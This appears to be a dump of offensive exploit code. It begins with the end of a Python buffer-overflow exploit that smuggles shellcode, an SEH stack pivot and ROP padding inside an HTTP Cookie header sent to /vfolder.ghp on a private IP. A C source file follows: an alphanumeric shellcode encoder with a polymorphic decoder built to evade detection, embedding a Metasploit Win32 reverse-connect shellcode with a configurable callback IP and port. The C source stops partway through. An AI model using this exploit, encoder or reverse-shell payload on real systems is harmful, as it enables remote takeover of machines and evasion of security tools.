"\xa5\x88\x1e\x99\x25\xd9\x76\x56\x0a\xd6\xb6\x97" shellcode += "\x81\xbf\xde\x12\x47\x0d\x7e\x22\x42\xd3\xde\x23" shellcode += "\x60\xc8\x37\xaa\x87\xef\x37\x4c\xb4\x39\x0e\x3a" shellcode += "\xfd\xf9\x35\x35\xb4\x5c\x1f\xdc\xb6\xf3\x5f\xf5" host = "192.168.44.139" port = 80 max_size = 4000 seh_offset = 57 eax_offset = 73 rop_offset = 2788 buffer = "A" * seh_offset # padding buffer += "BBBB" # nSEH Pointer buffer += struct.pack("<I", 0x1002280a) # SE Handler with stack pivot(# ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += "DDDD" # EAX overwrite buffer += "C" * rop_offset buffer += rop_chain buffer += shellcode buffer += "B" * (max_size - len(buffer)) # padding # HTTP GET Request request = "GET /vfolder.ghp HTTP/1.1\r\n" request += "Host: " + host + "\r\n" request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36" + "\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" + "\r\n" request += "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4" + "\r\n" request += "Cookie: SESSIONID=3672; UserID=PassWD=" + buffer + "; frmUserName=; frmUserPass=;" request += "\r\n" request += "Connection: keep-alive" + "\r\n" request += "If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT" + "\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host, port)) s.send(request + "\r\n\r\n") s.close()
  19. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. | int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. | | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 = 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | ////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | 